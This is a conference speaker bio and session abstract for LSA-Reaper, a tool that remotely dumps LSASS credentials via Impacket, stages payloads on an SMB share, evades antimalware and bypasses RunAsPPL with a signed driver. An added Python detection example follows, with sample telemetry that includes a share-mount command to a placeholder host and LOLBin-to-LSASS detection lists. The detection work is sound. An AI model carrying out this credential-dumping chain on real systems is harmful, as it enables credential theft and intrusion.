Daniel Cornett
Daniel Cornett is a recent graduate of the University of North Georgia with a Bachelor of Science in Cybersecurity. Daniel has been working in the private sector for a little over a year and in that time has passed both the CEH and GSEC exams. Daniel has a passion for coding, which has led him to create multiple tools that are used in red team engagements.
Session
LSA-Reaper is an advanced and versatile command line tool designed to facilitate remote dumping of the LSASS process by using Impacket's wmiexec, smbexec, or atexec tools.
The initial step of LSA-Reaper is a ping sweep across the provided IP addresses or IP ranges. This reconnaissance identifies live hosts so that later steps do not time out. Once live hosts are detected, LSA-Reaper creates an SMB share with a randomly generated username and password. This SMB share serves both as the exfiltration point for the LSASS dump and as the host for the payloads, ensuring that the payloads are never written to disk on the Windows hosts.
LSA-Reaper then runs the net use command on the victim's machine through Impacket's wmiexec, smbexec, or atexec to mount the previously created SMB share as a network drive on the target system. This step provides the transfer path on which the LSASS extraction relies.
The final stage entails the execution of the selected payload such as msbuild, regsvr32, calc.exe, or an EXE file. By employing these utilities, LSA-Reaper successfully extracts the LSASS data and directly saves it to the mounted SMB share. This approach offers an added advantage as it bypasses Windows antimalware systems that may attempt to delete or interfere with the LSASS dump file.
Finally, LSA-Reaper includes a feature that automatically bypasses the RunAsPPL security feature. It leverages a signed driver bundled with MSIAfterburner to elevate the payload's process to a PPL with the LSA signature, so the payload process can interact with the LSASS process without modifying the security level of the LSASS process itself.
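From a defender's side, the chain described above (a remotely spawned command that maps a fresh SMB share with net use, followed by a living-off-the-land binary such as msbuild or regsvr32 opening lsass.exe) is visible in ordinary endpoint telemetry. The following is an added detection example, not part of LSA-Reaper or the presenter's work: it correlates Sysmon-style process-creation (Event ID 1) and process-access (Event ID 10) records per host. The event records, hostnames, share name and the 192.0.2.0/24 address are constructed for the example, and the choice of WmiPrvSE.exe and services.exe as "remote execution" parent processes is an assumption about how wmiexec- and smbexec-style commands typically appear.

```python
"""Added detection example (constructed events; not LSA-Reaper code).
Correlates a remotely spawned `net use` share mount with a later lsass.exe
open by a LOLBin on the same host."""
from datetime import datetime, timedelta
import re

# Assumption: parents typical of Impacket-style remote execution
# (WmiPrvSE.exe for wmiexec commands, services.exe for smbexec's service).
REMOTE_EXEC_PARENTS = {"wmiprvse.exe", "services.exe"}
# Payload hosts named in the abstract that have no business reading LSASS memory.
LOLBIN_DUMPERS = {"msbuild.exe", "regsvr32.exe"}
# Captures the drive letter and the UNC path of a `net use X: \\host\share` command.
NET_USE_RE = re.compile(r"\bnet(?:\.exe)?\s+use\s+([A-Za-z]:)\s+(\\\\\S+)", re.IGNORECASE)
PROCESS_VM_READ = 0x0010          # access right required to read another process's memory
WINDOW = timedelta(minutes=10)    # how long a share mount counts as "recent"


def base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def analyze(events: list[dict]) -> list[dict]:
    """Return findings in time order. A LOLBin reading LSASS within WINDOW of a
    remotely spawned share mount on the same host is rated high; either
    behaviour on its own is rated medium."""
    mounts: dict[str, list] = {}   # host -> [(time, drive, unc_path)]
    findings = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.fromisoformat(ev["ts"])
        if ev["id"] == 1:
            m = NET_USE_RE.search(ev.get("cmd", ""))
            if m and base(ev["parent"]) in REMOTE_EXEC_PARENTS:
                mounts.setdefault(ev["host"], []).append((ts, m.group(1), m.group(2)))
                findings.append({"host": ev["host"], "time": ev["ts"], "severity": "medium",
                                 "rule": "remote_share_mount", "share": m.group(2),
                                 "parent": base(ev["parent"])})
        elif ev["id"] == 10 and base(ev["target"]) == "lsass.exe":
            src = base(ev["source"])
            wants_read = int(ev["access"], 16) & PROCESS_VM_READ
            if src in LOLBIN_DUMPERS and wants_read:
                recent = [mt for mt in mounts.get(ev["host"], []) if ts - mt[0] <= WINDOW]
                findings.append({"host": ev["host"], "time": ev["ts"],
                                 "severity": "high" if recent else "medium",
                                 "rule": "lolbin_lsass_access", "source": src,
                                 "share": recent[-1][2] if recent else None})
    return findings


# Constructed sample telemetry: one full chain on WS01, a benign AV scan on WS02,
# a lone regsvr32 LSASS open on WS03, and a benign user-initiated net use on WS01.
EVENTS = [
    {"ts": "2024-05-01T09:55:00", "host": "WS01", "id": 1, "pid": 3100,
     "image": "C:\\Windows\\System32\\net.exe", "parent": "C:\\Windows\\explorer.exe",
     "cmd": "net use H: \\\\fileserver\\home"},
    {"ts": "2024-05-01T10:00:02", "host": "WS01", "id": 1, "pid": 4120,
     "image": "C:\\Windows\\System32\\cmd.exe",
     "parent": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "cmd": "cmd.exe /Q /c net use Z: \\\\192.0.2.10\\lnfq3 /user:ab12cd p4ss"},
    {"ts": "2024-05-01T10:00:05", "host": "WS01", "id": 1, "pid": 4188,
     "image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe",
     "parent": "C:\\Windows\\System32\\cmd.exe", "cmd": "MSBuild.exe Z:\\build.xml"},
    {"ts": "2024-05-01T10:00:07", "host": "WS01", "id": 10, "pid": 4188,
     "source": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe",
     "target": "C:\\Windows\\System32\\lsass.exe", "access": "0x1FFFFF"},
    {"ts": "2024-05-01T10:03:00", "host": "WS02", "id": 10, "pid": 2204,
     "source": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\MsMpEng.exe",
     "target": "C:\\Windows\\System32\\lsass.exe", "access": "0x1010"},
    {"ts": "2024-05-01T10:20:00", "host": "WS03", "id": 10, "pid": 5012,
     "source": "C:\\Windows\\System32\\regsvr32.exe",
     "target": "C:\\Windows\\System32\\lsass.exe", "access": "0x1410"},
]

if __name__ == "__main__":
    for finding in analyze(EVENTS):
        print(finding)
```

Run as a script it prints three findings: the WmiPrvSE-spawned share mount on WS01, the MSBuild read of LSASS on WS01 rated high because it follows that mount, and the regsvr32 read on WS03 rated medium. The Defender engine's access and the explorer-spawned net use produce nothing. In production the parent-process set and the LOLBin list would be tuned to the environment, and the GrantedAccess check would be extended with the organisation's own allowlist of processes expected to read LSASS.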